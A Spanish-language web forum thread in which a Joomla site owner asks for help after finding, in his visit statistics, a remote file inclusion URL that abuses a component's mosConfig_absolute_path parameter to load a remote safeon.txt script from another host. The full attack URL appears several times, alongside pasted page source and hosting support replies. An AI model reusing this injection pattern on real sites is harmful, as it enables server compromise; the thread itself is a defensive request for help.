Resulta que viendo mis estadisticas me encuentro que hay alguien que está utilizando mi joomla para reenviar sus pánginas

http://www.vidabliss.com/index.php?option=com_registration&task=lostPassword/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.unipampa.edu.br/portal/administrator/components/com_joomla-visites/core/include/safeon.txt? (http://www.vidabliss.com/index.php?option=com_registration&task=lostPassword/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.unipampa.edu.br/portal/administrator/components/com_joomla-visites/core/include/safeon.txt?)

al final de la url sale esto.

http://www.unipampa.edu.br/portal/administrator/components/com_joomla-visites/core/include/safeon.txt?Alguien me podría decir como se quita eso, o como se protege uno?

gracias

EDITADO: cuando compartas enlaces inseguros debes colocarlos en medio de etiquetas CODE. Los usuarios deben saber que no son seguros los enlaces.

No sabría que responderte ya que los enlaces me detectan un virus..

por favor coloca una imagen que describa un poco mas la situación

Mientras leete el subforo de seguridad informática

Saludos

Trucos para tener un sitio Joomla seguro:
http://ayuda.joomlaspanish.org/index...=212&Itemid=94 (http://ayuda.joomlaspanish.org/index.php?option=com_content&task=view&id=212&Itemid=94)

Usar el htacces para defenderse:
http://www.joomlaspanish.org/foros/s...ead.php?t=3271 (http://www.joomlaspanish.org/foros/showthread.php?t=3271)

Gracias por responder, y lo siento si ese link te da como virus, a mi en mi ordenador y en otro que he probado no me sale ninguna advertencia del antivirus por eso en ningún momento pensaba que tenia algun virus, de saberlo no lo pondría aqui así. Perdon.


¿que antivirus usas?.

sobre el link lo voy a poner asi a ver si no sale el enlace.
en negrilla está la dirección de reenvio, pero en mi propia web
en esa dirección lo que sale es el modulo de registro de usuario.....
nombre, usuario, contraseña..... etc.

Me he dado cuenta de esto por que en mi componente de visitas de joomlastats, aparecen visitas de otros paises.. y solo visitando 1 pagina, al pinchar en que pagina han visto, es cuando aparece el siguiente link


3w.vidabliss.com/ index.php? option=com_registration&task=lostPassword/administrator/components/com_joomla-visites/core/include/myMailer.class.phpmosConfig_absolute_path=http://3w.unipampa.edu.br/portal/administrator/components/com_joomla-visites/core/include/safeon. txt?

Saludos

Pues mira uso Avast Pro...

Tienes algún otro hecho que haga pensar que has sido vulnerado, envío masivo de emails, se te ha llenado el espacio hosting muy rápido o no se, alguna seña, aparte del enlace en joomlastats, que te haga pensar que te han vulnerado...

Lo pregunto para descartar que sea algo "normal" del funcionamiento del componente

Si correcto, aumento de mi tamaño del hosting y aumento del ancho de banda,

Esto ya me paso hace 1 mes, y lo que hice fue limpiar todo el disco de mi hosting y volver a instalar el joomla-.... y demás.

lo instale hace 4 dias y ayer por la noche ya empezó otra vez lo mismo, y aumentando mi consumo de memoria y banda ancha...
y el problema es que cada vez va a mas, hoy por la tarde en 1 hora ya hay 4 visitas mas... y por mi última experiencia irá aumentando a mas de 20 al dia.

Tengo el avira, el nod 32 y pc tools spyware y ninguno me detecta nada con mi página.

Tengo instalado una pagina similar en un hosting USA, con los mismos componentes y hasta ahora no hay problema...

En cambio este en España ya es la segunda vez que me pasa esto.
De la anterior vez escribi al soporte de SYNC donde tengo alojado la web, comentando lo del ancho de banda y esa posible intrusión y esta es su respuesta:

Al parecer, le han intentado inyectar código en su alojamiento mediante url, vemos que da un error de acceso, por lo que no han podido ejecutarlo, por lo que no debería tener ningún problema.

Lo recomendable es tener siempre actualizados los programas a la última versión más estable para que este tipo de ataques no los puedan realizar aunque los intenten.

Un saludo.

Eso si al final, he tenido que pagar por exceso en el ancho de banda.

Lo dice claramente en el código fuente de tu página


<p class="style5"><a href="http://www.joomla-visites.net/" title="Joomla-Visites : Software GPL de estad�sticas web"
onclick="window.open(this.href);return(false);">
<script type="text/javascript">
<!--
var a_vars = Array();
var pagename='';

var joomlaVisitesSite = 1;
var joomlaVisitesURL = "http://www.vidabliss.com/components/com_joomla-visites/joomla-visites.php";
var joomlaVisitesUser = 0;
//-->
</script>

<script language="javascript" src="http://www.vidabliss.com/components/com_joomla-visites/joomla-visites.js" type="text/javascript"></script>
<noscript>
</noscript>
</a></p>
<span class="style5"><a href="http://www.joomla-visites.net/" title="Joomla-Visites : Software GPL de estad�sticas web"
onclick="window.open(this.href);return(false);"><noscript></noscript><noscript></noscript></a><noscript></noscript></span><noscript><p class="style5"><a href="http://www.joomla-visites.net/" title="Joomla-Visites : Software GPL de estad�sticas web" onclick="window.open(this.href);return(false);">Joomla-Visites : Software GPL de estad�sticas web
<img src="http://www.vidabliss.com/components/com_joomla-visites/joomla-visites.php" alt="Statistics" style="border:0" />
</a></p></noscript><span class="style5"><script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javascript">
_uacct = "UA-471636-1";
urchinTracker();
</script>

al final


<!-- Joomla-Visites -->
<span class="style5"><a href="http://www.joomla-visites.net/" title="Joomla-Visites : Software GPL de estad�sticas web" onclick="window.open(this.href);return(false);"><script type="text/javascript">
<!--
var a_vars = Array();
var pagename='';

var joomlaVisitesSite = 1;
var joomlaVisitesURL = "http://www.vidabliss.com/components/com_joomla-visites/joomla-visites.php";
var joomlaVisitesUser = 0;
//-->
</script>
<script language="javascript" src="http://www.vidabliss.com/components/com_joomla-visites/joomla-visites.js" type="text/javascript"></script>
<noscript></noscript></a></span><noscript><p class="style5"><a href="http://www.joomla-visites.net/" title="Joomla-Visites : Software GPL de estad�sticas web" onclick="window.open(this.href);return(false);">Joomla-Visites : Software GPL de estad�sticas web
<img src="http://www.vidabliss.com/components/com_joomla-visites/joomla-visites.php" alt="Statistics" style="border:0" />
</a></p></noscript>
<!-- /Joomla-Visites -->


El problema de ese alguien es que fuiste tu al instalar un componente o módulo de estadísticas. Desinstala cualquier cosa que brinde estadísticas y usa el log de apache, que se puede ver mediante AWSTAT generalmente en cualquier hosting que cuente con Cpanel

Si correcto mea culpa por instalar un componente de estadisticas, concretamente el joomlastats


pero resulta que tambien lo tengo instalado en otro servidor con otra pagina, exactamente igual a la primera, y ahi por ahora no hay nada de nada.

probaré a quitarlo y a seguir las estadisticas desde el cpanel.

Lo que pienso ahora, es que entonces el componente joomlastats ¿es malicioso?.


Gracias, a ver si funciona..